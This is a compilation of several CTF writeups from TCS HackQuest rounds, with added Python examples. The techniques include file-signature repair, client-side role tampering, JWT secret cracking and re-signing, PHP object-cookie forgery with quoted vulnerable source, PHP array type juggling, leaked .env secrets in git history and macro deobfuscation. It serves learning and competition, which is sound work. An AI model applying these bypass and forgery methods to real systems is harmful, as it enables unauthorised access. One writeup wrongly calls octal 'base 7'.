TCS HackQuest Questions

The document outlines a series of cybersecurity challenges and their solutions, focusing on various techniques such as file corruption repair, web exploitation, regex manipulation, and TLS certificate analysis. Each challenge provided a flag upon successful completion, with participants using tools like hex editors, JavaScript analysis, and QR code fixing. The document also describes the transition from round 1 to round 2 of the competition, highlighting the increased focus on web exploitation and the proctored nature of the second round.

Uploaded by Neha


Challenge 1: Miss Magic

Point: 100

The objective of this challenge is to find a way to fix the given corrupted file and find the flag in it. The given file seemed to be an image file of PNG type, but the file is corrupted and the image viewer software failed to recognize the file as an image. When opening the file in a hex editor and analyzing it, I found out that the file signature that describes the type of file, also known as magic bytes, is mismatched.

Based on the extension of the file I googled the magic bytes of a PNG file, which are 89 50 4E 47 0D 0A 1A 0A in hex. After replacing the bytes with the correct ones the file is fixed, and opening it in an image viewer gives the flag: HQ8{b1beaf412f0a738590c464e79b3baab2}.

Challenge file after the fix reveals the flag.
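The same signature check and repair in code, as an added example (not part of the writeup): it verifies the 8 PNG magic bytes, rewrites them, and then confirms the first chunk is a valid IHDR so you know the rest of the file was intact. The sample PNG and the corrupted copy are constructed in the block.

```python
# Added example: check and repair a PNG file signature, then sanity-check
# that the first chunk is IHDR with a valid CRC. Sample data is constructed.
import struct
import zlib

PNG_SIGNATURE = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])


def has_png_signature(data: bytes) -> bool:
    """True when the first 8 bytes are the PNG magic bytes."""
    return data[:8] == PNG_SIGNATURE


def repair_png_signature(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the correct PNG signature.

    Only the signature is touched; chunk data is left as-is, which is exactly
    what the hex-editor fix in the writeup does.
    """
    if len(data) < 8:
        raise ValueError("file too short to be a PNG")
    return PNG_SIGNATURE + data[8:]


def first_chunk_info(data: bytes) -> dict:
    """Parse the first chunk after the signature and verify its CRC.

    A real PNG must start with an IHDR chunk (13-byte payload). The CRC covers
    the chunk type and payload, not the length field.
    """
    length, ctype = struct.unpack(">I4s", data[8:16])
    payload = data[16:16 + length]
    stored_crc = struct.unpack(">I", data[16 + length:20 + length])[0]
    crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == stored_crc
    info = {"type": ctype.decode("ascii"), "length": length, "crc_ok": crc_ok}
    if ctype == b"IHDR" and length == 13:
        width, height = struct.unpack(">II", payload[:8])
        info.update({"width": width, "height": height})
    return info


def build_sample_png(width: int, height: int) -> bytes:
    """Construct a minimal, valid PNG (signature + IHDR + IEND) for testing."""
    def chunk(ctype: bytes, payload: bytes) -> bytes:
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)
    # IHDR: width, height, bit depth 8, colour type 2 (RGB), compression 0, filter 0, interlace 0
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IEND", b"")


def corrupt_signature(data: bytes) -> bytes:
    """Constructed 'broken' file: the 8 signature bytes replaced with a GIF-like header."""
    return b"GIF89a\x00\x00" + data[8:]


if __name__ == "__main__":
    good = build_sample_png(320, 240)
    bad = corrupt_signature(good)
    print("broken file recognised as PNG:", has_png_signature(bad))
    fixed = repair_png_signature(bad)
    print("after repair:", has_png_signature(fixed), first_chunk_info(fixed))
```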


Challenge 2: Trusting Response

Point: 100

This is a web exploitation challenge where a website is given and a few username/password combinations are present in the code. One of them is “user:user”; using this combination I logged into the challenge site successfully. After some enumeration I found some interesting keywords like admin and user in the JavaScript file. From these words we can assume that they are related to user roles or special permissions.

Once I started analysing the website’s traffic I found out that on initial loading the site makes a request to an API endpoint “/api/currentuserrole”, which returns the role as user. On changing the role from user to admin the site immediately displays the flag: HQ8{9c1b7e435cff855b7f478ccf12fbda6c}.

Challenge 3: Search Shenanigans

Point: 100

This challenge provides us with a website with search functionality. My initial thought was that it could be something related to SQL injection, since the site takes the input from the user and returns a list of vulnerabilities and their descriptions matching the user input, but any common SQL injection payload simply doesn’t work.

After some time playing around with the application I noticed a behaviour that reminded me of regex (regular expressions): if I search for “sq” as the input, it returns all the data that contains the letters “sq”. So I thought this could be using regex under the hood, and simply providing “*” in the input returns a regex error. With this I confirmed that it is using regex to retrieve the data. To get the flag I used the following payload: “f*”, and it returns the flag: HQ8{3212047ddc9c0960d61a9fb3b39cf9d4}
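The behaviour above in code, as an added example (not the challenge's own code): a search that compiles user input directly as a pattern, so “*” raises a regex error and “f*” matches every record, next to the hardened version that escapes the input so it can only ever be a literal substring match. The vulnerability list is constructed sample data.

```python
# Added example: a search that feeds user input straight into re.compile
# (the behaviour observed in the challenge) next to a hardened version.
import re

# Constructed sample records standing in for the site's vulnerability list.
VULNS = [
    ("SQL injection", "untrusted input concatenated into a SQL query"),
    ("Cross-site scripting", "untrusted input rendered as HTML"),
    ("Flag", "HQ8{constructed_placeholder_flag}"),
    ("Path traversal", "file path built from user input"),
]


def search_vulnerable(term: str) -> list:
    """Input is compiled as a pattern: '*' raises re.error, 'f*' matches every record."""
    pattern = re.compile(term, re.IGNORECASE)
    return [name for name, desc in VULNS if pattern.search(name) or pattern.search(desc)]


def search_hardened(term: str) -> list:
    """re.escape turns the input into a literal, so metacharacters lose their meaning."""
    pattern = re.compile(re.escape(term), re.IGNORECASE)
    return [name for name, desc in VULNS if pattern.search(name) or pattern.search(desc)]


def search_result_or_error(search_fn, term: str):
    """Run a search and report a regex error the way the site did, instead of crashing."""
    try:
        return search_fn(term)
    except re.error as exc:
        return f"regex error: {exc}"


if __name__ == "__main__":
    for term in ("sq", "*", "f*"):
        print(f"{term!r:5} vulnerable={search_result_or_error(search_vulnerable, term)}"
              f" hardened={search_result_or_error(search_hardened, term)}")
```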

Challenge 4: Cloak and Dagger

Point: 100

A zip file including a TLS certificate and key file is provided. Initially I had no idea about TLS certificates; after researching them on the internet I found out that I can read the contents of the certificate file using the following command:

openssl x509 -in <certificate_file> -text -noout

Upon inspecting the output of the command, I found the flag in the CN field of the output.
Flag: HQ8{a9564ebc3289b7a14551baf8ad5ec60a}

Challenge 5: Deceptive Mayhem

Point: 200

This is also one of the web category challenges. We are provided with a website that looks like a blog page. Let’s consider the challenge domain as challenge.com. Upon inspecting the site, any attempt to visit a random page on that site results in a 404 Not Found with an animated image of a girl cutting an onion; this image holds the hint of .onion sites. Upon inspecting the traffic of the site, I noticed that on loading the site’s URL “challenge.com/” it first gets an empty HTML page with JavaScript code, and it immediately redirects to the blog page “challenge.com/home.html”. So I started Burp Suite and captured the initial JavaScript code that loads on the first page.

JavaScript code:

    // Attempt to load hidden website
    fetch('http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/', { method: 'HEAD' })
        .then(response => {
            // If OK
            if (response.ok) {
                window.location.href = 'http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/';
            }
            else {
                // If !OK
                window.location.href = 'home.html';
            }
        })
        .catch(error => {
            // Something is not OK
            window.location.href = 'home.html';
        });

The above code attempts to make a request to the URL http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/ with the HEAD method. If the response is OK (200) then it redirects the user to http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/

If the request fails it redirects the user to the home.html path, which is our normal blog page. Note that the URL the JavaScript code is attempting to request is a .onion site, which means we can only access this site through the Tor network.

So I quickly spun up my Kali Linux VM and connected to the Tor network using the Tor Browser. Visiting challenge.com from the Tor Browser takes us to the .onion site mentioned in the code, which gives us the flag: HQ8{a6471162999e92c79db70e11e7e9cd6e}.

Side-by-side comparison of the challenge site from Tor and a normal browser.

With this, round 1 was over. I made a detailed report on the challenges I solved and the challenges I attempted, uploaded it on the portal and completed round 1.

Round 2:

10 days after the completion of HackQuest Round 1, I received an email saying I had made it to round 2 of the competition. So I prepared for round 2, and the day finally came! Round 2 consisted of 5 challenges, of which I managed to solve 2. Unlike round 1, which included challenges from many categories, round 2’s challenges were highly focused on the web exploitation category, and it was a proctored round, which means you are connected to a group meeting on Teams with your webcam (always) and microphone (whenever needed) on. During the competition we were constantly monitored; some of the participants were even caught and disqualified by the invigilators.

Challenge 1: Token Tango

Point: 200

A website is provided for us in this challenge. After inspecting the site I found a JWT token with fields like iat, role and exp in the cookies of the site. So I started testing JWT token based vulnerabilities, but nothing worked. After that I tried to crack the secret key that is used to sign the token using the JWT_TOOL tool and the rockyou.txt wordlist, which resulted in success! I managed to find the secret that is used to sign the JWT token. With this I changed the role from user to admin, re-signed the JWT token and sent it to the server on the next request to retrieve the flag: HQ8{e5052b56dd93e775ba76108f87003306}.
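What makes this work, shown from the verifying side as an added example (not the challenge's or jwt_tool's code, standard library only): an HS256 JWT signed and verified with HMAC, a role change without the key failing verification, and a defender-side audit that checks whether a token issued by your own service verifies under any entry of a wordlist, which is the same weakness the wordlist attack above relied on. The secrets and claims are constructed.

```python
# Added example: HS256 JWT sign/verify from the standard library, a tampered
# role failing verification, and a wordlist audit of the signing secret.
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: str) -> str:
    """Produce a compact HS256 JWT: base64url(header).base64url(payload).base64url(sig)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_jwt(token: str, secret: str) -> Optional[dict]:
    """Return the claims when the HS256 signature matches, otherwise None.

    The algorithm is pinned to HS256, so a header claiming 'alg: none' is rejected too.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(_b64url_decode(payload_b64))


def change_role_without_key(token: str, new_role: str) -> str:
    """Edit the role claim but keep the original signature: verification must fail."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    claims = json.loads(_b64url_decode(payload_b64))
    claims["role"] = new_role
    return f"{header_b64}.{_b64url(json.dumps(claims, separators=(',', ':')).encode())}.{sig_b64}"


def audit_secret(token: str, wordlist) -> Optional[str]:
    """Check a token issued by your own service against a wordlist.

    If any entry verifies the token, the signing secret is guessable and anyone
    holding the wordlist can re-sign tokens with role=admin, as in the challenge.
    """
    for candidate in wordlist:
        if verify_jwt(token, candidate) is not None:
            return candidate
    return None


if __name__ == "__main__":
    token = sign_jwt({"iat": 1700000000, "role": "user"}, "password")  # constructed weak secret
    print("valid:", verify_jwt(token, "password"))
    print("tampered:", verify_jwt(change_role_without_key(token, "admin"), "password"))
    print("weak secret found:", audit_secret(token, ["123456", "password", "letmein"]))
```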

Challenge 2: Kohraa

Point: 100

This is a very simple challenge, as its only goal is to fix the broken QR code and scan it to find the flag. But unfortunately, due to time constraints and my system issues, I couldn’t submit the flag for this challenge, which is considered as not completed on the organisation’s side. The given QR code is:

Broken QR code

Just by adding the missing position marker on the QR code we can retrieve a sequence of numbers as output.

Fixed QR code

QR code output: BEGIN:VCARDVERSION:3.0N:Kohraa;TEL:110 121 70 173 62 145 60 63 66 145 143 142 61 67 67 145 60 146 67 63 62 142 143 142 143 61 142 60 71 70 64 146 146 145 142 144 175END:VCARD

From the output we can see that this is vCard data with the name Kohraa and the phone number 110 121 70 173 62 145 60 63 66 145 143 142 61 67 67 145 60 146 67 63 62 142 143 142 143 61 142 60 71 70 64 146 146 145 142 144 175.

From observing the given number sequence we can say that this is an octal number (base 7), since the digits in the number are limited to 7; we can decode this to an ASCII string using the online tools available.

Decoded output (flag): HQ8{2e036ecb177e0f732bcbc1b0984ffebd}


-------------------------------------------------------------------------------------------------------------------------------------
Round 1

Demolition Derby — 200

I opened the file in my Kali and ran the file command; it was an ELF file, so I opened it in Binary Ninja and IDA. I used both because it is easier to view pseudo-C in Binary Ninja and the graphical view is better in IDA. I checked the password strength function and got the flag by looking into the hex view in IDA. I checked the flag strength, and when entering the correct flag it gave “you found the flag”.

Code de Tour — 100

Given Description: Bienvenue to our Cyber Security CTF challenge! Preparez-vous for an exciting
journey into the world of binary reversing. Explorez the intricacies of function calls as you unravel the
secrets hidden within. Embracez the challenge and showcasez your skills in this thrilling adventure.
Pouvez-vous déchiffrer le code and discover the flag? Bonne chance, mes amis! Let the cyber
exploration begin!


I opened the file in my Kali and ran the file command; it was an ELF file.
I found it was RC4 encoded and used the dcode.fr website to decrypt the encoded text with the secret key, which I found while navigating through the functions.

KEY: s1mpl3p4ss
MESSAGE: e6c7bead19a7b55225aa9beddebb26253fd78eee2a4ae1d64d52a07afcc7e3c7

Optimus Prime — 100

Given Description:
Join forces with Optimus Prime in an epic cyber quest! The fate of this world hangs in the balance as
he seeks to crack the enigmatic pieces that hold the key to opening a portal. Your mission, should
you choose to accept it, is to assist Prime on his intergalactic journey. Unleash your inner hacker,
solve the puzzle, and help Prime reach his planet. The universe awaits your cyber prowess!

1. I tried the RSA algorithm since the challenge.txt file contains n, e and c.

2. I used dcode.fr to decode the RSA cipher.

3. This gave me the flag: HQ8{c03a8384a71a8e6c566021ed5ca7ec7b}


The Rivest-Shamir-Adleman (RSA) algorithm is a public-key encryption algorithm that uses asymmetric encryption to encrypt and decrypt data.

Deceptive Mayhem — 200


Given Description: A key piece of information that sheds light on the activities of threat group
“Lahasun_Pyaaj” is concealed within a seemingly benign website. At first glance, the site reveals a
clear static facade, luring unsuspecting visitors into a false sense of security. However, the true
machinations of “Lahasun_Pyaaj” unfold in a hidden forum accessible only through the special
powers. Your mission is to decode the dual nature of the digital labyrinth, exposing the group’s plans
to hack and leak breaches. Delve into the shadows, extract critical information, and thwart their
nefarious schemes before it’s too late.

I first opened the website and it had nothing interesting, so I read the description again and found the word “Lahasun_Pyaaj”. I searched Google for what that is and found it means garlic onion, which refers to onion, meaning there is something in the onion website. It also has the hint “hack and leak breaches”, which means only if I find the onion link can I proceed further.

I tried to log in to the website and it gave me “There is onion in your code”; only then did I try visiting the HTTP history in Burp Suite, where I got the flag and submitted it.
I intercepted the request with Burp Suite, viewed the HTTP history and found the onion URL. I opened it in Tor Browser and found the leaked password database where I found the flag.

Round 2

Request tracer-100

Challenge Description:
Behind the user-friendly interface of every web application lies a complex
tapestry of digital communication. This communication occurs through a
series of silent requests and responses, governed by a hidden language
that ensures the smooth operation of the application. Explore the intricate
pathways that govern the methodical flow of information. Navigate the
unseen mechanisms that shape the X-change between client and server.
Uncover the secrets of communication protocols and the vital components
that govern their behavior.

The website has a drop-down option with a traceroute button for four different subdomains of the TCS website. I displayed the traceroute for the website, which showed “*”, and I could not infer anything from there. Then I read the source code, took the JWT cookie and decrypted it, and found the user as GUEST. I sent a request in Repeater in Burp Suite and found in the response that the PATCH method was supported, so I requested again with the PATCH method and found the flag.

OFFICE LEAKS -200

Challenge Description:
Amidst Silicon Valley’s tech frenzy, an innocent photo captured a sensitive
document on a screen. Panic ensued as the photo went viral, but Arvind, a
cybersecurity whiz, stepped in. Using his expertise, he tracked down the
leaked document and identified the culprits. Regrettably, the leaked image
continues to circulate on the internet, and we have successfully obtained a
copy. Your task is to uncover the sensitive content that was inadvertently
disclosed and make a report on the damage caused due to the leak.


First I analysed the image with the file command and used exiftool, and started doing image forensics. I also thought some file would be hidden, and used steghide and binwalk to extract the hidden content, but nothing was found.
After that I used the HxD editor and tried to refer to the magic bytes, and also searched for similar challenges.

I referred to this article from the internet: https://cyberhacktics.com/hiding-information-by-changing-an-images-height/

After reading the article I thought the image was not shown in its complete portion, and rendered the image. I uploaded the image to CyberChef, imported it To Hex and copied the hex values. After that I input those hex values and modified the values from
ff c0 00 11 08 05 f5 05 39 to ff c0 00 11 08 09 f5 05 39

05 -> 09 in the 6th position of this.
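The edit above, done by parsing the JPEG instead of counting bytes by hand, as an added example (not the writeup's own tooling): it walks the marker segments to the SOF0 frame header, reads the stored height and width (precision, then 2-byte height, then 2-byte width), and rewrites only the height field, 05 f5 to 09 f5. The JPEG header bytes are constructed around the SOF0 bytes quoted above; the challenge image itself is not reproduced.

```python
# Added example: locate the SOF0 frame header of a JPEG, read the stored
# height/width, and patch the height the way the writeup did (05f5 -> 09f5).
import struct

SOF_MARKERS = {0xC0, 0xC1, 0xC2}  # baseline, extended sequential, progressive
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))  # markers with no length field


def find_sof(data: bytes) -> int:
    """Return the offset of the SOF marker's 0xFF byte, or raise if absent."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing JPEG SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte before a marker, skip it
            pos += 1
            continue
        if marker in SOF_MARKERS:
            return pos
        if marker in STANDALONE:
            pos += 2
            continue
        if marker == 0xDA:            # start of scan: the frame header must precede it
            break
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len
    raise ValueError("no SOF marker found")


def frame_dimensions(data: bytes) -> tuple:
    """(height, width) from the SOF segment layout: length(2) precision(1) height(2) width(2)."""
    sof = find_sof(data)
    height, width = struct.unpack(">HH", data[sof + 5:sof + 9])
    return height, width


def patch_height(data: bytes, new_height: int) -> bytes:
    """Rewrite only the 2-byte height field; every other byte is unchanged."""
    sof = find_sof(data)
    off = sof + 5
    return data[:off] + struct.pack(">H", new_height) + data[off + 2:]


def build_sample_jpeg_prefix() -> bytes:
    """Constructed header: SOI, a JFIF APP0 segment, then the SOF0 bytes quoted in the writeup."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sof0 = bytes.fromhex("ffc0 0011 08 05f5 0539 03 01 22 00 02 11 01 03 11 01")
    return b"\xff\xd8" + app0 + sof0


if __name__ == "__main__":
    img = build_sample_jpeg_prefix()
    print("stored height x width:", frame_dimensions(img))        # (1525, 1337)
    taller = patch_height(img, 0x09F5)
    print("after patch:", frame_dimensions(taller), taller[find_sof(taller):find_sof(taller) + 9].hex(" "))
```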


After completing the CTF I solved another challenge, the QR code challenge.

KOHRAA -100

Challenge Description:
Embark on a digital journey through the haze of our Blurry Enigma Hunt!
Someone intentionally blurred this image, challenging you to sharpen your
skill and uncover the hidden treasure. The missing piece holds the key, and
once you have pieced it together you need to uncover the message within
the blurry landscape.
There was a broken QR code; we need to fix it to get the flag. After analysing the QR code I found the left box was missing, so I cropped the box using the online photo editor https://www.iloveimg.com/photo-editor and attached it there.
After scanning I got the message.

BEGIN:VCARD
VERSION:3.0
N:Kohraa;
TEL:110 121 70 173 62 145 60 63 66 145 143 142 61 67 67 145 60 146 67 63 62 142 143 142 143 61 142 60 71 70 64 146 146 145 142 144 175
END:VCARD

I used CyberChef with From Octal and got the flag.
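The octal decode done in both Kohraa writeups (the round 2 one earlier on this page and this one), as an added example rather than either author's tooling: a small vCard parser pulls out the TEL property, the digit-range heuristic from the first writeup picks the base, and each space-separated token is decoded as an octal byte. The vCard text is the one quoted above.

```python
# Added example: parse the vCard the fixed QR code produced and decode the
# octal byte values in its TEL field into the flag.
import re

# The QR output as quoted in the writeup, with the line breaks the scanner dropped restored.
QR_OUTPUT = (
    "BEGIN:VCARD\nVERSION:3.0\nN:Kohraa;\n"
    "TEL:110 121 70 173 62 145 60 63 66 145 143 142 61 67 67 145 60 146 67 63 62 "
    "142 143 142 143 61 142 60 71 70 64 146 146 145 142 144 175\nEND:VCARD"
)


def parse_vcard(text: str) -> dict:
    """Minimal vCard 3.0 parser: property name -> value for the lines between BEGIN and END."""
    lines = [ln.strip() for ln in text.replace("\r\n", "\n").split("\n") if ln.strip()]
    if not lines or lines[0] != "BEGIN:VCARD" or lines[-1] != "END:VCARD":
        raise ValueError("not a vCard")
    props = {}
    for line in lines[1:-1]:
        name, _, value = line.partition(":")
        props[name.upper()] = value
    return props


def guess_base(field: str) -> int:
    """Digit-range heuristic from the writeup: only 0-7 suggests octal, 0-9 decimal, else hex."""
    digits = set(field.replace(" ", ""))
    if digits <= set("01234567"):
        return 8
    if digits <= set("0123456789"):
        return 10
    return 16


def decode_octal_words(field: str) -> str:
    """Treat each whitespace-separated token as an octal byte value and decode as ASCII."""
    tokens = field.split()
    if not tokens or not all(re.fullmatch(r"[0-7]{1,3}", t) for t in tokens):
        raise ValueError("field is not a sequence of octal bytes")
    return bytes(int(t, 8) for t in tokens).decode("ascii")


def flag_from_qr(text: str) -> str:
    """Full pipeline: vCard -> TEL property -> base check -> decoded string."""
    vcard = parse_vcard(text)
    tel = vcard["TEL"]
    if guess_base(tel) != 8:
        raise ValueError("TEL field does not look octal")
    return decode_octal_words(tel)


if __name__ == "__main__":
    print(parse_vcard(QR_OUTPUT))
    print(flag_from_qr(QR_OUTPUT))
```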


--------------------------------------------------------------------------------------------------------------------------------------
Challenge No 1: I am Always…

Flag: hq5{w1nn324v3n932}

Points: 100

Description: Relating the anger issues of hulk with the hidden flag.

Solution/Approach :

1. As we all know, Hulk is the strongest Avenger, so it immediately made sense to go with his image details; I also compared him to other Avengers to double-check.

2. I extracted the EXIF data from it and found that it had a file location (directory/path).

3. Then I just entered the main domain followed by the path I received, in the directory URL format (tcshackquest.com/avengersassembleathackquest).

4. And then finally, I found the main flag required.

Challenge No 2 : DigiMagic (This challenge was removed after some time)

Flag: hq5{s0_Y0u_KN0WHoW$$1_worKs}

Points: 100

Description: The hint was in the challenge title itself: digital certificates are a thing.

Solution/Approach :

1. In this, I noticed that the description said digital certificates are necessary, and it immediately clicked that there might be something to do with the digital certificate itself.

2. Then by doing a Nikto scan I got details and followed the remote IP; it was something like 62.XX…, and by default it was using the HTTP (insecure) protocol and it showed me a hint.

3. Then I studied the certificate and found a base64 string hidden in the ISSUER section along with other details, as follows:

4. Finally, I decoded the base64 string and got the required flag, as follows:

Challenge No 3 : Reggie Rich

Flag: hq5{3nc2yp7*m45732}
Points: 100

Description: Matching PHP string using preg_match().

Solution/Approach :

1. In this, I noticed in the source code, by using inspect element, that it used a specific pattern with the PHP preg_match() function.

2. So I used first the initial string in a prefix manner, then the original string, and then the string in a suffix manner, so we get hackhackquestchampquestchamp as the magical string, by referring to the function below.

3. So, here we can say that Pattern1 was hack, Pattern2 was the original string and at last Pattern3 was questchamp.

4. Finally, after using the magical string, I got the flag as follows:

Challenge No 4 : Pandemic Inhibitor

Flag: hq5{HopeWeReturnToTheOldNormal}

Points: 400 (The only major challenge I got at that time)

Description: Vaccine manufacturers and POST requests were the only clues I got after reading it.

Solution/Approach :

1. In this, I got that we need to forward an API request externally, so I used Postman for it as I had basic knowledge of it.

2. I used the parameters given in the tcshackquest portal, the main directory of API parameters, by locating it (below is the directory snippet).

3. Then I realized that I need to pass several parameters, like a SQL injection pattern.

4. Then I used the earlier cookie, which we used for the main login (for the hackquest portal), as follows:

5. Finally, after the Covaxin value I got my flag, and it showed me a doubtful warning when I used the Pfizer vaccine as the value, like (will it really cure it?) #atmanirbharbharat

-------------------------------------------------------------------------------------------------------------------------------------
Challenge:- Alien Message
The given text is base64 because at the end of the string there is a “==” symbol, which is generally used for base64 padding.

txt msg

I used the base64 command to decode the message.

man base64

finding the message

The decoded message is a PNG file; I used a QR decoder tool to find out the result.
Decoded msg

Challenge:- Lost Batman

The given file has no extension, so to find out the type of the file, use the file command (google about magic numbers).

The file is a tcpdump capture; we can use Wireshark to open this pcap file.

After doing a quick analysis I found out that the captured data is some sort of website.

To export all the files go to the File menu → Export Objects → HTTP, then Save All.
There are many text and image files, and running strings on joker.jpg gives us the flag.

Challenge Name:- Calling Charlie

The given file is a .wav file. On listening, we found out that it is Morse code, and used an online tool to decode it.

Challenge:- Reset Password

There is a login page that is used to update the password, which requires the old password. I simply deleted the element using inspect element and submitted the form.

There are many ways to do this challenge; we can use Burp to capture the request and remove the old password field.

Challenge:- Leaks and Leaks

The given description gives us the hint that it is related to some sort of AWS or maybe an AWS key.

The given file is a git repository, so we can find all the previous commits and roll back to find out what changes were made.
git revert (double tab to find out all the possible values, fancy stuff :P)

After this revert command it will open the commit file, which shows where the changes occur; in our case the .env file is modified.
We can use git revert 4811fc and cat .env, which also gives the flag.

Challenge:- Excess Talent

The challenge gives the hint that our request is seen by some special browser. It looks like some type of injection, so I started an ngrok server and sent some payloads, and after some tries I got the response.
On the left side ngrok is running and on the right-hand side we are listening with nc; in the left hand we got the flag in the User-Agent field.

------------------------------------------------------------------------------------------------------------------------------------
Web Exploitation

Strand Match

A login web application which asks for a user ID and the flag itself.

It was a simple challenge to exploit string comparison of a PHP site. The site was a simple login form.
Request intercepted in Burp Suite

By simply making the Flag variable into an array we get the flag.

Adding square brackets to the Flag

Flag displayed in the alert

Agent 007

A simple company web page.

By simply checking the robots.txt file we get:

Checking the sitemap of the website also reveals some interesting endpoints:

Sitemap

devl0per.html is an interesting endpoint, so I intercepted the web request and changed the User-Agent to HQBOT.
Crafted request

It returns a redirect, which we follow with the same config, and this gives us the flag.

Sassy Spaghetti

A web page with Guest / basic privileges.

Checking robots.txt gives an endpoint to the old version of the main website.
robots.txt

It had the source code clearly visible.

<?php
class User{
    public string $name;
    public string $role;
    public bool $haveTicket;
}

$userobj=new User();
$userobj->name="guest";
$userobj->role="Guest";

// The session cookie is just the base64 of the serialized object: no signature, no server-side state.
$ser_obj=serialize($userobj);
$cookiee=base64_encode($ser_obj);
if(!isset($_COOKIE["session"])){
    setcookie("session",$cookiee,time()+86400*30,"/","",TRUE,TRUE);
    header('Location: /check.php');
}
?>

<?php
if(isset($_COOKIE["session"])){
    // Whatever the client sends is unserialized and trusted, so a crafted object sets any role.
    $resobj=unserialize(base64_decode($_COOKIE["session"]));
    if($resobj->name=="hqadmin" && $resobj->role=="Administrator" && $resobj->haveTicket==TRUE){
        echo '<img src="Flag.gif" width="480" height="auto" frameborder="0" allowfullscreen=""><br>';
        echo "HQ7{404 Flag not found}";
    }
    else{
        echo "<h2>You don't have Administrator role.</h2>";
        echo '<img src="Ticket.gif" width="60%" height="auto" frameborder="0" allowfullscreen="">';
    }
}
?>

So simply crafting the PHP object, base64 encoding it and sending it as a cookie using Burp Suite will get us our flag.

Manipulating cookie

Miscellaneous

Nemo

A web application log file was given.

By simply searching for “HQ7”, as it is the flag format, I discovered the flag as well as an RCE endpoint.
Flag in reverse

Rorschach Test

A text file was given which had a lot of “Wahzaa !! ” strings.

Simply by replacing “Wahzaa !! ” with an empty string and some formatting we get the flag.

Onion Head

A pdf file was given.


PDF

Running strings on the file gave out an interesting hexadecimal block.
Hex block

Converting it to ASCII using CyberChef gave out a zip file.

Zip file header “PK” clearly visible

Extracting it gave out flag.png

Forensics

Lure

A word file was given.

The extension was .docm; the “m” stands for macro-enabled file. To extract the macro code, I used olevba.

Obfuscated VBA Code

To deobfuscate the code I simply replaced the Invoke-Expression command with ActiveDocument.Content.InsertAfter Text:=, which basically prints the output to the Word document file. I used the inbuilt macro editor in Microsoft Word to execute the script.
Microsoft Word inbuilt macro editor

It gave out a huge base64 encoded string.

Output as Base64 encoded string

I used CyberChef to decode the base64 string which gave out a PowerShell script.
Obfuscated PowerShell Script

Again after decoding the base64 string I got the main PowerShell script.

Main PowerShell script

The $mainInfo variable contains the flag in ASCII values.


Using PowerShell to print out the variable

Converting ASCII to Char using CyberChef

Shallot Discover

Docker repo folder was given.


Checking out JSON files gave the location for the flag.

One of the folders contained layer.tar archive which contained the file “.WhatsInside.txt” which had
our flag encoded using ROT13.

ROT13 encoded flag

Dull Drip

A git-initialized folder was given, which was of LinPEAS.

I simply used the git log command to check the logs and found an interesting entry. Then I used git revert to roll back to the initial state.
Commits made to local repo

This gave out flag.txt

Reverse Engineering

Tokyo RE

The encrypted flag was given along with a Python compiled file which had the logic for the encryption.
Encrypted flag

I used uncompyle6 to decompile the .pyc file.

Decompiled logic

I coded a python script to decrypt the flag.

flag = [72, 82, 57, 126, 55, 58, 128, 128, 103, 121, 61, 63, 134, 134, 139]
enc = []

# The encryption added each character's index to its code point,
# so subtracting the index gives the original character back.
for i in range(0, len(flag)):
    enc.append(chr(flag[i] - i))

for k in enc:
    print(k, end="")
print()

Lame Rev

Another challenge similar to the previous one; this challenge was only up for a few minutes for me, hence I was not able to submit the flag on the portal.
Encrypted flag

Used uncompyle6 to decompile the python compiled file.

Decompiled python code for encryption logic

So, I wrote a python script to decrypt the flag.


l1 = [74, 82, 57, 124, 54, 109, 118, 52, 116, 111, 54, 117, 53, 96, 81, 113, 53, 115, 54, 117, 51, 112,
      112, 126]
Encrypted = []

# Even positions were shifted up by 2 and odd positions by 1, so undo each shift.
for i in range(len(l1)):
    if i % 2 == 0:
        Encrypted.append(chr(l1[i] - 2))
    else:
        Encrypted.append(chr(l1[i] - 1))

for k in Encrypted:
    print(k, end="")
print()

-----------------------------------------------------------------------------------------------------------------------------------
Challenge 1
Title: The Lost Batman
Points: 200
Description: Recover the stolen files of Batman.
Download File: https://bit.ly/2tfZwhB
Solution: The given file has no extension so we run `file` to determine the file type. We find out that
the file is pcap capture file so we open it with Wireshark. Followed HTTP Stream on joker.jpg which
